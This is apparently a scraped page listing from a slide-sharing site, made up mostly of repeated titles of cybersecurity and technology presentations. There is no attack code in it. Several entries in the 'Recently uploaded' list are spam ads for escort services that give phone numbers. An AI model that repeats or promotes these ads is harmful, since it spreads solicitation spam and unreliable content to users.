Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

Recently uploaded (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Hacking exposed : The adversary Oscars